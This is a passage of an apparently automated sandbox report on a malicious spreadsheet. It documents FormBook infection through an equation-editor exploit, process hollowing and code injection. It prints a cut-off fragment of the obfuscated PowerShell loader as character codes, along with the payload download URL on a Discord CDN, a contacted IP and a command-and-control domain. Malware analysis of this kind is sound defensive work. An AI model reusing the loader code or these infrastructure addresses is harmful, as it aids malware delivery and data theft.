0,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,4
6,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
Source: explorer.exe, 0000000C.00000000.2234479423.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 0000000C.00000000.2234479423.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000C.00000000.2211664415.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000000.2234479423.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 1 | Path Interception | Process Injection 712 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 321 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter 211 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Masquerading 111 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 131 | Security Account Manager | Virtualization/Sandbox Evasion 131 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 13 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 712 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 11 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 41 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 2 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 452643 | Sample: PO20210722.xlsx | Start date: 22/07/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 12 other signatures. DNS lookup: google.com.

Process tree recovered from the graph (the graph image itself is not reproduced here):

EXCEL.EXE (started)
    dropped: C:\Users\user\Desktop\~$PO20210722.xlsx, data
EQNEDT32.EXE (started)
    network: 172.245.119.43, 49165, 80 AS-COLOCROSSINGUS United States
    dropped: C:\Users\user\AppData\Local\...\obi[1].exe, PE32+; C:\Users\Public\vbc.exe, PE32+
    signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    -> vbc.exe (started)
        signatures: Multi AV Scanner detection for dropped file; Obfuscated command line found; Very long command line found
        -> powershell.exe (started)
            network: cdn.discordapp.com 162.159.130.233, 443, 49166 CLOUDFLARENETUS United States
            signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes to foreign memory regions; Injects a PE file into a foreign processes
            -> calc.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
                -> NAPSTAT.EXE (started)
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    -> cmd.exe (started)
                -> explorer.exe (injected)
                    network: www.jewelryengravings.com
                    signature: System process connects to network (likely due to code injection or exploit)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
PO20210722.xlsx | 29% | Virustotal |
PO20210722.xlsx | 28% | ReversingLabs | Win32.Exploit.CVE-2017-11882

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe | 46% | Virustotal |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe | 20% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe | 57% | ReversingLabs | Win64.Spyware.Noon
C:\Users\Public\vbc.exe | 20% | Metadefender |
C:\Users\Public\vbc.exe | 57% | ReversingLabs | Win64.Spyware.Noon

          Unpacked PE Files

Source | Detection | Scanner | Label
11.2.calc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.google.com.br/ | 2% | Virustotal |
http://www.google.com.br/ | 0% | Avira URL Cloud | safe
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://%s.com | 0% | URL Reputation | safe
http://%s.com | 0% | URL Reputation | safe
http://%s.com | 0% | URL Reputation | safe
http://%s.com | 0% | URL Reputation | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://www.google.com.tw/ | 0% | Virustotal |
http://www.google.com.tw/ | 0% | Avira URL Cloud | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Virustotal |
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | URL Reputation | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://search.yahoo.co.jp | 0% | URL Reputation | safe
http://search.yahoo.co.jp | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 216.58.215.238 | true | false | | high
cdn.discordapp.com | 162.159.130.233 | true | false | | high
www.jewelryengravings.com | unknown | unknown | true | | unknown

                URLs from Memory and Binaries

Name | Source | Malicious | Reputation (antivirus detection results, where present, are listed as bullets under the row)
http://www.google.com.br/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• 2%, Virustotal
• Avira URL Cloud: safe
http://search.chol.com/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.mercadolivre.com.br/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://www.merlin.com.pl/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://search.ebay.de/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.mtv.com/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.rambler.ru/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.nifty.com/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.dailymail.co.uk/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://www3.fnac.com/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://buscar.ya.com/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://search.yahoo.com/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.sogou.com/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://asp.usatoday.com/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
https://cdn.discordapp.com/attachments/858793322087710753/86389185760801590 | powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp | false | high
http://fr.search.yahoo.com/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
https://cdn.discordapp.com/attachments/858793322087710753/863891857608015902/oad.jpg | powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp | false | high
http://rover.ebay.com | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://in.search.yahoo.com/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://search.ebay.in/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://%s.com | explorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmp | false | low
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://msk.afisha.ru/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://www.google.com.tw/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• 0%, Virustotal
• Avira URL Cloud: safe
http://search.rediff.com/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.windows.com/pctv. | explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmp | false | high
http://www.ya.com/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.etmall.com.tw/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://it.search.dada.net/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://search.naver.com/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://www.google.ru/ | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | high
http://search.hanafos.com/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmp | false
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.daum.net/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://search.naver.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://buscar.ozu.es/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://kr.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.about.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://busca.igbusca.com.br/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://www.ask.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.cjmall.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.centrum.cz/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://suche.t-online.de/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.google.it/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.auction.co.kr/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.ceneo.pl/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.amazon.de/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000C.00000000.2232348196.000000000B320000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://sads.myspace.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://cdn.discordapp.com/attachments/85879332208771075powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.pchome.com.tw/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://browse.guardian.co.uk/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://google.pchome.com.tw/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.rambler.ru/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://uk.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://espanol.search.yahoo.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.ozu.es/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://search.sify.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://openimage.interpark.com/interpark.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://search.yahoo.co.jp/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.ebay.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.gmarket.co.kr/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://search.nifty.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
